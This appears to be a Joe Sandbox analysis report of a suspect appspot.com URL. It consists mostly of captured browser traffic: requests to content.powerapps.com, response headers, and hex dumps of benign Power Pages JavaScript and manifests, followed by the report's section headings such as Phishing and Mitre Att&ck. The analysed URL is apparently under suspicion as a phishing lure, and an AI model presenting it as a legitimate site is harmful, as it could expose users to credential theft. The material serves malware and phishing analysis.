f=he("<tr></tr>").attr("data-id",d.Id).attr("data-entity",ae.EntityName).attr("data-name",s\|\|"").on("focus",function(){he(this).addClass("active")}).on("blur",fu
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 65 3d 67 3b 6b 2e 65 6e 74 69 74 79 49 64 3d 79 3b 43 6c 69 65 6e 74 4c 6f 67 57 72 61 70 70 65 72 2e 67 65 74 4c 6f 67 67 65 72 28 29 2e 74 72 61 63 65 49 6e 66 6f 28 22 45 6e 74 69 74 79 47 72 69 64 20 67 65 74 44 61 74 61 28 29 3a 20 47 65 74 20 64 61 74 61 22 2c 22 65 6e 74 69 74 79 5f 67 72 69 64 22 2c 22 22 2c 22 47 65 74 44 61 74 61 22 29 3b 76 61 72 20 77 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6b 29 3b 73 68 65 6c 6c 2e 61 6a 61 78 53 61 66 65 50 6f 73 74 28 7b 74 79 70 65 3a 22 50 4f 53 54 22 2c 64 61 74 61 54 79 70 65 3a 22 6a 73 6f 6e 22 2c 63 6f 6e 74 65 6e 74 54 79 70 65 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2c 75 72 6c 3a 65 2c 64 61 74 61 3a 77 2c 67 6c 6f 62 61 6c 3a Data Ascii: e=g;k.entityId=y;ClientLogWrapper.getLogger().traceInfo("EntityGrid getData(): Get data","entity_grid","","GetData");var w=JSON.stringify(k);shell.ajaxSafePost({type:"POST",dataType:"json",contentType:"application/json; charset=utf-8",url:e,data:w,global:
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 2e 61 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 3b 74 2e 63 6c 6f 73 65 73 74 28 22 2e 61 63 74 69 6f 6e 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 62 75 74 74 6f 6e 22 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 7d 29 7d 29 7d 65 6c 73 65 7b 6e 2e 66 69 6e 64 28 22 2e 71 75 61 6c 69 66 79 2d 6c 65 61 64 2d 6c 69 6e 6b 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 74 3d 68 65 28 74 68 69 73 29 2e 63 6c 6f 73 65 73 74 28 22 74 72 22 29 3b 76 61 72 20 61 3d 74 2e 64 61 74 61 28 22 69 64 22 29 3b 76 61 72 20 6e 3d 7b 7d 3b 6e 2e 63 72 65 61 74 65 41 63 63 6f 75 6e 74 3d 74 72 75 65 3b 6e 2e 63 72 65 61 74 65 43 6f 6e 74 Data Ascii: .attr("aria-hidden","true");t.closest(".action").children("button").trigger("focus")})})}else{n.find(".qualify-lead-link").on("click",function(e){e.preventDefault();var t=he(this).closest("tr");var a=t.data("id");var n={};n.createAccount=true;n.createCont
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 70 65 2e 61 64 64 44 65 61 63 74 69 76 61 74 65 41 63 74 69 6f 6e 4c 69 6e 6b 43 6c 69 63 6b 45 76 65 6e 74 48 61 6e 64 6c 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 76 61 72 20 6f 3d 65 2e 5f 65 6c 65 6d 65 6e 74 3b 76 61 72 20 74 3d 65 2e 5f 6c 61 79 6f 75 74 73 3b 76 61 72 20 6c 3d 74 5b 65 2e 5f 61 63 74 69 76 65 4c 61 79 6f 75 74 49 6e 64 65 78 5d 3b 76 61 72 20 61 3d 65 2e 5f 65 6e 61 62 6c 65 41 63 74 69 6f 6e 73 3b 76 61 72 20 6e 3d 6f 2e 63 68 69 6c 64 72 65 6e 28 22 2e 76 69 65 77 2d 67 72 69 64 22 29 2e 66 69 6e 64 28 22 74 61 62 6c 65 22 29 3b 69 66 28 21 61 7c 7c 21 6c 2e 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 44 65 61 63 74 69 76 61 74 65 41 63 74 69 6f 6e 4c 69 6e 6b 2e 45 6e 61 62 6c 65 64 26 26 21 6c Data Ascii: pe.addDeactivateActionLinkClickEventHandlers=function(){var e=this;var o=e._element;var t=e._layouts;var l=t[e._activeLayoutIndex];var a=e._enableActions;var n=o.children(".view-grid").find("table");if(!a\|\|!l.Configuration.DeactivateActionLink.Enabled&&!l

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:02 UTC	407	OUT	GET /resource/powerappsportal/controls/host/874.d64d28bc67.chunk.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:03 UTC	824	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:03 GMT Content-Type: application/x-javascript Content-Length: 7604 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA000000Y x-ms-static-content: NR000000S Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 21077e41-cc25-4737-a4d7-38e260ec5f2f x-ms-correlation-id: cf433953-0c7e-41ec-86ec-40ca9a306bda x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=7.6,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141202Z-17f859c6f6bcrw57hC1MNZmxew0000000130000000002a8d X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:12:03 UTC	7604	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 6d 69 63 72 6f 73 6f 66 74 5f 70 6f 77 65 72 70 61 67 65 73 5f 68 6f 73 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 6d 69 63 72 6f 73 6f 66 74 5f 70 6f 77 65 72 70 61 67 65 73 5f 68 6f 73 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 37 34 2c 34 39 33 5d 2c 7b 37 31 32 31 3a 65 3d 3e 7b 0a 2f 2a 0a 6f 62 6a 65 63 74 2d 61 73 73 69 67 6e 0a 28 63 29 20 53 69 6e 64 72 65 20 53 6f 72 68 75 73 0a 40 6c 69 63 65 6e 73 65 20 4d 49 54 0a 2a 2f 0a 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 74 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 6e Data Ascii: "use strict";(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host\|\|[]).push([[874,493],{7121:e=>{/object-assign(c) Sindre Sorhus@license MIT/var r=Object.getOwnPropertySymbols,t=Object.prototype.hasOwnProperty,n

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:06 UTC	407	OUT	GET /resource/powerappsportal/controls/host/349.dc388c8b0d.chunk.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:06 UTC	853	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:06 GMT Content-Type: application/x-javascript Content-Length: 49544 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: ga00000HH x-ms-static-content: NR000000A Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: f5cdf9fb-a494-4e1c-8617-c8a4bc6dcc97 x-ms-correlation-id: cad6e8c1-7e9b-4417-b311-ad7b5bcded3a x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=75.4,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141206Z-1848b945c76ld5qbhC1MNZathg00000000u000000000ar4s X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:06 UTC	15531	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 6d 69 63 72 6f 73 6f 66 74 5f 70 6f 77 65 72 70 61 67 65 73 5f 68 6f 73 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 6d 69 63 72 6f 73 6f 66 74 5f 70 6f 77 65 72 70 61 67 65 73 5f 68 6f 73 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 34 39 5d 2c 7b 34 32 31 30 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 52 45 41 43 54 5f 44 45 56 5f 52 4f 4f 54 3a 28 29 3d 3e 55 74 2c 52 45 41 43 54 5f 50 52 4f 44 5f 52 4f 4f 54 3a 28 29 3d 3e 4d 74 7d 29 3b 76 61 72 20 6f 2c 6e 2c 61 2c 6c 2c 69 3d 72 28 37 30 30 35 29 2c 63 3d 72 2e 6e 28 69 29 2c 64 3d 72 28 39 37 30 31 29 2c 73 3d 72 2e 6e 28 64 29 2c 75 3d 72 28 31 35 37 29 2c Data Ascii: "use strict";(self.webpackChunk_microsoft_powerpages_host=self.webpackChunk_microsoft_powerpages_host\|\|[]).push([[349],{4210:(e,t,r)=>{r.r(t),r.d(t,{REACT_DEV_ROOT:()=>Ut,REACT_PROD_ROOT:()=>Mt});var o,n,a,l,i=r(7005),c=r.n(i),d=r(9701),s=r.n(d),u=r(157),
2025-01-15 14:12:07 UTC	16384	IN	Data Raw: 4e 65 75 74 72 61 6c 53 74 72 6f 6b 65 32 3a 6f 2e 6e 65 75 74 72 61 6c 51 75 61 74 65 72 6e 61 72 79 41 6c 74 2c 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 53 74 72 6f 6b 65 33 3a 6f 2e 6e 65 75 74 72 61 6c 4c 69 67 68 74 65 72 2c 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 53 74 72 6f 6b 65 53 75 62 74 6c 65 3a 6f 2e 6e 65 75 74 72 61 6c 51 75 61 74 65 72 6e 61 72 79 41 6c 74 2c 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 53 74 72 6f 6b 65 4f 6e 42 72 61 6e 64 3a 6f 2e 77 68 69 74 65 2c 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 53 74 72 6f 6b 65 4f 6e 42 72 61 6e 64 32 3a 6f 2e 77 68 69 74 65 2c 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 53 74 72 6f 6b 65 4f 6e 42 72 61 6e 64 32 48 6f 76 65 72 3a 6f 2e 77 68 69 74 65 2c 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 53 74 72 6f 6b 65 4f 6e 42 72 61 Data Ascii: NeutralStroke2:o.neutralQuaternaryAlt,colorNeutralStroke3:o.neutralLighter,colorNeutralStrokeSubtle:o.neutralQuaternaryAlt,colorNeutralStrokeOnBrand:o.white,colorNeutralStrokeOnBrand2:o.white,colorNeutralStrokeOnBrand2Hover:o.white,colorNeutralStrokeOnBra
2025-01-15 14:12:07 UTC	16384	IN	Data Raw: 29 3d 3e 7b 6e 75 6c 6c 3d 3d 65 7c 7c 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 65 6c 65 63 74 69 6f 6e 45 76 65 6e 74 22 2c 68 29 7d 7d 29 2c 5b 5d 29 2c 28 30 2c 69 2e 75 73 65 45 66 66 65 63 74 29 28 28 28 29 3d 3e 7b 64 26 26 28 6e 7c 7c 6c 3f 64 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 6f 6d 70 6f 6e 65 6e 74 2d 73 65 6c 65 63 74 65 64 22 29 3a 64 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 63 6f 6d 70 6f 6e 65 6e 74 2d 73 65 6c 65 63 74 65 64 22 29 29 7d 29 2c 5b 64 2c 6e 2c 6c 5d 29 2c 28 30 2c 69 2e 75 73 65 45 66 66 65 63 74 29 28 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 3b 63 6f 6e 73 74 20 72 3d 6e 75 6c 6c 3d 3d 61 7c 7c 6e 75 6c 6c 3d 3d 3d 28 65 3d 61 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 Data Ascii: )=>{null==e\|\|e.removeEventListener("selectionEvent",h)}}),[]),(0,i.useEffect)((()=>{d&&(n\|\|l?d.classList.add("component-selected"):d.classList.remove("component-selected"))}),[d,n,l]),(0,i.useEffect)((()=>{var e,t;const r=null==a\|\|null===(e=a.data)\|\|void
2025-01-15 14:12:07 UTC	1245	IN	Data Raw: 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 67 69 73 74 65 72 65 64 49 6e 73 74 61 6e 63 65 73 2e 68 61 73 28 65 29 3f 74 68 69 73 2e 72 65 67 69 73 74 65 72 65 64 49 6e 73 74 61 6e 63 65 73 2e 67 65 74 28 65 29 3a 74 68 69 73 2e 63 72 65 61 74 65 41 6e 64 52 65 67 69 73 74 65 72 49 31 38 6e 49 6e 73 74 61 6e 63 65 28 65 2c 74 29 7d 2c 67 65 74 43 75 72 72 65 6e 74 4c 61 6e 67 75 61 67 65 28 29 7b 72 65 74 75 72 6e 5b 2e 2e 2e 74 68 69 73 2e 72 65 67 69 73 74 65 72 65 64 49 6e 73 74 61 6e 63 65 73 2e 76 61 6c 75 65 73 28 29 5d 5b 30 5d 3f 2e 6c 61 6e 67 75 61 67 65 3f 3f 22 65 6e 2d 55 53 22 7d 2c 63 72 65 61 74 65 41 6e 64 52 65 67 69 73 74 65 72 49 31 38 6e 49 6e 73 74 61 6e 63 65 28 65 2c 74 29 7b 63 6f 6e 73 74 20 72 3d 7b 2e 2e 2e 63 2c 69 Data Ascii: ,t){return this.registeredInstances.has(e)?this.registeredInstances.get(e):this.createAndRegisterI18nInstance(e,t)},getCurrentLanguage(){return[...this.registeredInstances.values()][0]?.language??"en-US"},createAndRegisterI18nInstance(e,t){const r={...c,i

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:07 UTC	410	OUT	GET /resource/powerappsportal/controls/pcf_loader/manifest-0.0.27.json HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:07 UTC	947	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:07 GMT Content-Type: application/json Content-Length: 170 Connection: close Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-correlation-id,x-ms-activity-vector,x-ms-service-request-id,x-ms-client-request-id Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000AG x-ms-static-content: ZE0000014 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: df6df262-b02f-43a0-8b7a-6847ce75908c x-ms-correlation-id: bca567b2-cef4-4500-9d40-e62736d53c5a x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=15.4,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141207Z-1848b945c76259rkhC1MNZe7cc00000001200000000037sn X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 74730419 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:07 UTC	170	IN	Data Raw: 7b 0a 20 20 20 20 22 50 63 66 43 6f 6e 74 72 6f 6c 50 72 6f 78 79 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6c 69 62 72 61 72 79 22 3a 20 22 70 63 66 5f 6c 6f 61 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 6d 6f 74 65 45 6e 74 72 79 22 3a 20 22 2f 70 63 66 5f 6c 6f 61 64 65 72 2f 72 65 6d 6f 74 65 45 6e 74 72 79 2e 66 30 35 39 36 38 31 32 32 37 2e 6a 73 22 2c 0a 20 20 20 20 20 20 20 20 22 63 6f 6e 74 72 6f 6c 22 3a 20 22 2e 2f 50 63 66 43 6f 6e 74 72 6f 6c 50 72 6f 78 79 22 0a 20 20 20 20 7d 0a 7d Data Ascii: { "PcfControlProxy": { "library": "pcf_loader", "remoteEntry": "/pcf_loader/remoteEntry.f059681227.js", "control": "./PcfControlProxy" }}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Chrome Cache Entry: 134

Chrome Cache Entry: 135

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Chrome Cache Entry: 140

Chrome Cache Entry: 141

Chrome Cache Entry: 142

Chrome Cache Entry: 143

Chrome Cache Entry: 144

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Chrome Cache Entry: 148

Chrome Cache Entry: 149

Chrome Cache Entry: 150

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Windows Analysis Report
https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:07 UTC	409	OUT	GET /resource/powerappsportal/controls/data_grid/manifest-1.1.26.json HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:08 UTC	793	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:08 GMT Content-Type: application/json Content-Length: 290 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000AB x-ms-static-content: ZE00000C0 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 9984898d-66f2-4b1a-8ead-ddc2ecad2b97 x-ms-correlation-id: 2f2dbe5b-1489-4a97-ad5a-7dd8625b2aee x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=45.2,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141207Z-17f859c6f6bwlwgzhC1MNZacd40000000180000000008vpp X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:12:08 UTC	290	IN	Data Raw: 7b 0a 20 20 20 20 22 47 72 69 64 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6c 69 62 72 61 72 79 22 3a 20 22 64 61 74 61 5f 67 72 69 64 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 6d 6f 74 65 45 6e 74 72 79 22 3a 20 22 2f 64 61 74 61 5f 67 72 69 64 2f 72 65 6d 6f 74 65 45 6e 74 72 79 2e 62 66 63 62 63 31 30 32 36 61 2e 6a 73 22 2c 0a 20 20 20 20 20 20 20 20 22 63 6f 6e 74 72 6f 6c 22 3a 20 22 2e 2f 47 72 69 64 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 46 6f 72 6d 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6c 69 62 72 61 72 79 22 3a 20 22 64 61 74 61 5f 67 72 69 64 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 6d 6f 74 65 45 6e 74 72 79 22 3a 20 22 2f 64 61 74 61 5f 67 72 69 64 2f 72 65 6d 6f 74 65 45 6e 74 72 79 2e 62 66 63 62 63 31 30 32 36 61 2e 6a 73 22 2c 0a Data Ascii: { "Grid": { "library": "data_grid", "remoteEntry": "/data_grid/remoteEntry.bfcbc1026a.js", "control": "./Grid" }, "Form": { "library": "data_grid", "remoteEntry": "/data_grid/remoteEntry.bfcbc1026a.js",

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:08 UTC	408	OUT	GET /resource/powerappsportal/controls/mf_shared/manifest-0.2.7.json HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:08 UTC	792	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:08 GMT Content-Type: application/json Content-Length: 332 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000C7 x-ms-static-content: NR0000027 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 0a0471cd-f8c3-48e4-9ef9-38bc41300fe1 x-ms-correlation-id: 564022be-4db9-42d7-91a3-ee81dad67028 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=8.6,x-ms-igw-req-overhead;dur=0.2 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141208Z-1848b945c76cmqgdhC1MNZq6d0000000010g0000000088kg X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:12:08 UTC	332	IN	Data Raw: 7b 0a 20 20 20 20 22 75 73 65 50 61 67 65 73 53 74 6f 72 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6c 69 62 72 61 72 79 22 3a 20 22 6d 66 5f 73 68 61 72 65 64 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 6d 6f 74 65 45 6e 74 72 79 22 3a 20 22 2f 6d 66 5f 73 68 61 72 65 64 2f 72 65 6d 6f 74 65 45 6e 74 72 79 2e 33 31 34 34 31 61 64 63 61 62 2e 6a 73 22 2c 0a 20 20 20 20 20 20 20 20 22 63 6f 6e 74 72 6f 6c 22 3a 20 22 2e 2f 75 73 65 50 61 67 65 73 53 74 6f 72 65 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 46 65 64 65 72 61 74 65 64 43 6f 6e 74 72 6f 6c 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6c 69 62 72 61 72 79 22 3a 20 22 6d 66 5f 73 68 61 72 65 64 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 6d 6f 74 65 45 6e 74 72 79 22 3a 20 22 2f 6d 66 5f 73 68 61 72 65 Data Ascii: { "usePagesStore": { "library": "mf_shared", "remoteEntry": "/mf_shared/remoteEntry.31441adcab.js", "control": "./usePagesStore" }, "FederatedControl": { "library": "mf_shared", "remoteEntry": "/mf_share

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:08 UTC	418	OUT	GET /resource/powerappsportal/controls/controls_fluent_v9/manifest-0.0.30.json HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:08 UTC	964	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:08 GMT Content-Type: application/json Content-Length: 8462 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-correlation-id,x-ms-activity-vector,x-ms-service-request-id,x-ms-client-request-id Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000CA x-ms-static-content: ze0000002 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: bcd45e9b-7a45-438f-8466-129fcfbba348 x-ms-correlation-id: 9841a3f0-8725-4017-9437-a27dd6b5dc38 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=68.7,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141208Z-1848b945c76kqngjhC1MNZmngc00000000pg000000009t6k X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:08 UTC	8462	IN	Data Raw: 7b 0a 20 20 20 20 22 41 76 61 74 61 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6c 69 62 72 61 72 79 22 3a 20 22 63 6f 6e 74 72 6f 6c 73 5f 66 6c 75 65 6e 74 5f 76 39 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 6d 6f 74 65 45 6e 74 72 79 22 3a 20 22 2f 63 6f 6e 74 72 6f 6c 73 5f 66 6c 75 65 6e 74 5f 76 39 2f 72 65 6d 6f 74 65 45 6e 74 72 79 2e 32 36 38 36 63 39 34 66 35 31 2e 6a 73 22 2c 0a 20 20 20 20 20 20 20 20 22 63 6f 6e 74 72 6f 6c 22 3a 20 22 2e 2f 41 76 61 74 61 72 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 41 76 61 74 61 72 47 72 6f 75 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6c 69 62 72 61 72 79 22 3a 20 22 63 6f 6e 74 72 6f 6c 73 5f 66 6c 75 65 6e 74 5f 76 39 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 6d 6f 74 65 45 6e 74 72 79 22 3a 20 22 2f Data Ascii: { "Avatar": { "library": "controls_fluent_v9", "remoteEntry": "/controls_fluent_v9/remoteEntry.2686c94f51.js", "control": "./Avatar" }, "AvatarGroup": { "library": "controls_fluent_v9", "remoteEntry": "/

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:09 UTC	414	OUT	GET /resource/powerappsportal/controls/mf_shared/remoteEntry.31441adcab.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:09 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:09 GMT Content-Type: application/x-javascript Content-Length: 8107 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000AG x-ms-static-content: NR0000010 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 9702e779-a5b5-4479-8da9-2a5f8b907fba x-ms-correlation-id: badb7213-7154-408a-9959-6fbdab34723e x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=36.0,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141209Z-1848b945c76pfnbrhC1MNZgyn400000000y0000000006z0t X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 